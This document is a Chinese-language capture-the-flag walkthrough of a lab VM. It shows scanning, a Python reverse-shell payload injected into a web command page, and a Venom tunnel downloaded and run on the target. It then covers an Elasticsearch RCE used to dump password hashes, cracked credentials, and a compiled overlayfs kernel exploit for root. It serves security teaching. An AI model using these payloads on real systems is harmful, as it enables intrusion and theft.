● 主機(jī)發(fā)現(xiàn)
┌──(root?kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.15 00:0c:29:74:e0:7d VMware, Inc.
192.168.10.254 00:50:56:f1:51:7f VMware, Inc.
● 端口服務(wù)掃描
┌──(root?kali)-[~]
└─# nmap -p- 192.168.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 02:17 EST
Nmap scan report for 192.168.10.15
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:74:E0:7D (VMware)
┌──(root?kali)-[~]
└─# nmap -p22,5000 -sC -sV 192.168.10.15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
| 2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
| 256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_ 256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 00:0C:29:74:E0:7D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
● web信息收集
用瀏覽器訪問(wèn)http://192.168.10.15:5000娃善,但在頁(yè)面上并沒(méi)有發(fā)現(xiàn)有用的信息
對(duì)http://192.168.10.15:5000進(jìn)行目錄掃描,發(fā)現(xiàn)一個(gè)隱藏目錄admin
┌──(root?kali)-[~]
└─# dirsearch -u http://192.168.10.15:5000
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Target: http://192.168.10.15:5000/
[02:27:15] Starting:
[02:27:20] 200 - 401B - /admin
Task Completed
瀏覽器訪問(wèn)http://192.168.10.15:5000/admin链嘀,發(fā)現(xiàn)可以執(zhí)行命令
● 代碼注入
使用Python反彈shell懂版,這段代碼將使用鹃栽!先nc在Kali主機(jī)上監(jiān)聽(tīng)TCP5555端口
在http://192.168.10.15:5000/admin輸入Python Shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.100",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
● 反彈shell
┌──(root?kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 40592
/app #
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),
20(dialout),26(tape),27(video)
/app # whoami
root
/app # ls
Dockerfile
main.py
requirements.txt
templates
/app #
● 信息搜集
發(fā)現(xiàn)收到Shell為docker主機(jī)的root權(quán)限,但發(fā)現(xiàn)處于容器環(huán)境中
Tip:判斷主機(jī)為Docker容器的兩種方法:
方法一:確認(rèn)根目錄下是否存在.dockerenv文件
ls /.dockerenv
方法二:查看/proc/1/cgroup是否存在docker目錄
cat /proc/1/cgroup
/app # ls /.dockerenv
/.dockerenv
/app # cat /proc/1/cgroup
11:hugetlb:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
10:perf_event:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
9:blkio:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
8:freezer:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
7:devices:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
6:memory:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
5:cpuacct:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
4:cpu:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
3:cpuset:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
2:name=systemd:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
/app #
內(nèi)網(wǎng)主機(jī)掃描結(jié)果,發(fā)現(xiàn)172.17.0.1躯畴,172.17.0.2民鼓,172.17.0.3為存活主機(jī)
/app # for i in $(seq 1 254); do ping -c 1 172.17.0.$i; done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.044 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.044/0.044/0.044 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.035 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.035/0.035/0.035 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
● 內(nèi)網(wǎng)穿透
部署Venom內(nèi)網(wǎng)穿透工具
Kali主機(jī)Venom目錄啟動(dòng)Python3 Http Server,將Venom中的代理端程序傳給目標(biāo)靶機(jī)
python3 -m http.server 80
┌──(root?kali)-[~/桌面/venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.10.15 - - [10/Feb/2023 03:01:33] "GET /agent_linux_x64 HTTP/1.1" 200 -
啟動(dòng)Venom管理端蓬抄,監(jiān)聽(tīng)本地9999端口
./admin_linux_x64 -lport 9999
┌──(root?kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success 客戶端成功上線
靶機(jī)端安裝客戶端64位版本
cd /tmp
wget -c http://192.168.10.100/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
客戶端成功上線
┌──(root?kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 58313
/app #
/app # cd /tmp
/tmp # ls
/tmp #
/tmp # wget -c http://192.168.10.100/agent_linux_x64
Connecting to 192.168.10.100 (192.168.10.100:80)
agent_linux_x64 100% |*******************************| 3791k 0:00:00 ETA
/tmp # ls
agent_linux_x64
/tmp # chmod +x agent_linux_x64
/tmp # ./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
2023/02/10 08:02:03 [+]Successfully connects to a new node
客戶端成功上線
查看丰嘉、控制Venom節(jié)點(diǎn)、啟動(dòng)socks隧道
┌──(root?kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success 客戶端成功上線
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1 進(jìn)入客戶端
node 1
(node 1) >>> socks 1080 在客戶端開(kāi)socks端口嚷缭,用1080端口代理服務(wù)端流量到內(nèi)網(wǎng)網(wǎng)段
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
venom服務(wù)器(KALI)掛Socks對(duì)內(nèi)網(wǎng)進(jìn)行掃描
為實(shí)現(xiàn)用kali的強(qiáng)大功能對(duì)內(nèi)網(wǎng)網(wǎng)段進(jìn)行滲透供嚎,
需修改proxychains配置:使用sock5服務(wù),啟用本地1080端口轉(zhuǎn)發(fā)kali發(fā)向內(nèi)網(wǎng)的流量
vi /etc/proxychains4.conf
修改最后一行為:
socks5 127.0.0.1 1080
sudo proxychains nmap -Pn -sT -sV 172.17.0.1
Nmap scan report for 172.17.0.1 的結(jié)果
Host is up (0.0096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo proxychains nmap -Pn -sT -sV 172.17.0.2
Nmap scan report for 172.17.0.2 的結(jié)果
Host is up (0.0063s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Ka-Zar; cluster: elasticsearch; Lucene 4.10.2)
sudo proxychains nmap -Pn -sT -sV 172.17.0.3
sudo proxychains nmap -Pn -sT -sV 172.17.0.3 的結(jié)果
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5000 ... OK
Nmap scan report for 172.17.0.3
Host is up (0.0095s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
● 漏洞利用
利用Elasticsearch漏洞獲取目標(biāo)靶機(jī)登錄用戶名和密碼
┌──(root?kali)-[~/桌面/venom]
└─# searchsploit elasticsearch
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metaspl | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Executi | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root?kali)-[~/桌面/venom]
└─# cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
┌──(root?kali)-[~/桌面/venom]
└─# sudo proxychains python2 36337.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██? ██ ▓█████ ██▓ ██▓
▓█ ? ▓██? ?████▄ ?██ ? ▓ ██? ▓?▓██??██? ?█ ?██ ? ▓██? ██?▓█ ? ▓██? ▓██?
?███ ?██? ?██ ?█▄ ? ▓██▄ ? ▓██? ???██??▓█ ▄ ? ▓██▄ ?██??██??███ ?██? ?██?
?▓█ ▄ ?██? ?██▄▄▄▄██ ? ██?? ▓██▓ ? ?██??▓▓▄ ▄██? ? ██??▓█ ?██ ?▓█ ▄ ?██? ?██?
??████??██████?▓█ ▓██??██████?? ?██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████?
?? ?? ?? ??▓ ??? ▓?█?? ?▓? ? ? ? ?? ?▓ ? ?? ? ?? ?▓? ? ? ? ??????? ?? ?? ??▓ ?? ??▓ ?
? ? ?? ? ? ? ? ?? ?? ?? ? ? ? ? ? ? ? ? ?? ? ? ? ??? ? ? ? ?? ? ? ?? ? ? ?
? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ?? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ cat passwords
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
~$ id
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
uid=0(root) gid=0(root) groups=0(root)
● 密碼破解
john:3f8184a7343664553fcb5337a3138814
1337hack
test:861f194e9d6118f3d942a72be3e51749
1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b
1111pass
root:b3d34352fc26117979deabdf1b9b6354
1234pass
jane:5c158b60ed97c723b673529b8a3cf72b
1234jane
● 本地提權(quán)
通過(guò)依次嘗試峭状,john:1337hack可以登錄目標(biāo)靶機(jī)
┌──(root?kali)-[~/桌面/venom]
└─# ssh john@192.168.10.15
john@192.168.10.15's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Fri Feb 10 11:18:26 EST 2023
System load: 0.0 Processes: 390
Usage of /: 12.8% of 14.64GB Users logged in: 0
Memory usage: 5% IP address for eth0: 192.168.10.15
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Oct 28 22:36:16 2018 from 10.0.0.8
john@socnet:~$
john@socnet:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@socnet:~$ whoami
john
john@socnet:~$
john用戶提權(quán)失敗克滴,
john@socnet:~$ sudo -s
[sudo] password for john:
john is not in the sudoers file. This incident will be reported.
嘗試內(nèi)核提權(quán)
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
john@socnet:~$
找漏洞利用代碼
──(root?kali)-[~/桌面/venom]
└─# searchsploit linux 3.13.0 ubuntu
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X8 | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Lo | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pri | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilt | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / L | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via Us | linux/local/41760.txt
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
但是靶機(jī)沒(méi)有安裝gcc
john@socnet:~$ gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
john@socnet:~$
且查看37292.c腳本發(fā)現(xiàn),還需編譯ofs-lib.so文件优床。所以考慮把ofs-lib.so文件從lib文件復(fù)制出劝赔,并注釋掉37292.c相關(guān)代碼再便宜,并將編譯后的文件和ofs-lib.so共同上傳目標(biāo)靶機(jī)
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# vim 37292.c
注釋掉相關(guān)代碼
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
查找ofs-lib.so文件位置
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# gcc -o exp 37292.c
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# ls
36337.py 37292.c exp ofs-lib.so
編譯好的exp和ofs-lib.so上傳至目標(biāo)靶機(jī)
kali啟動(dòng)http server
┌──(root?kali)-[~/桌面/venom/bbbb]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
靶機(jī)
在靶機(jī)上下載exp和ofs-lib.so
cd /tmp
wget http://192.168.10.100/exp
wget http://192.168.10.100/ofs-lib.so
john@socnet:/tmp$ ls
exp ofs-lib.so
john@socnet:/tmp$
john@socnet:/tmp$ chmod +x exp
john@socnet:/tmp$ ./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
尷尬了胆敞,執(zhí)行不了着帽。杂伟。。仍翰。
只能試試?yán)戏椒撕罩啵遣磺泻蠈?shí)戰(zhàn)要求
就是給靶機(jī)安裝好gcc和g++
然后把.c源文件上傳到靶機(jī)里,在靶機(jī)里編譯好后執(zhí)行予借。
john@socnet:/tmp$ gcc 37292.c
john@socnet:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
# id
uid=0(root) gid=0(root) groups=0(root),1001(john)
# whoami
root
# ls -al
total 56
drwxrwxrwt 3 root root 4096 Feb 10 07:29 .
drwxr-xr-x 22 root root 4096 Oct 27 2018 ..
-rwxrwxr-x 1 john john 4975 Feb 10 06:54 37292.c
-rwxrwxr-x 1 john john 13652 Feb 10 07:29 a.out
-rwxrwxr-x 1 john john 16936 Feb 10 06:54 exp
drwxr-xr-x 2 root root 4096 Feb 10 07:23 gcc
# pwd
/tmp
#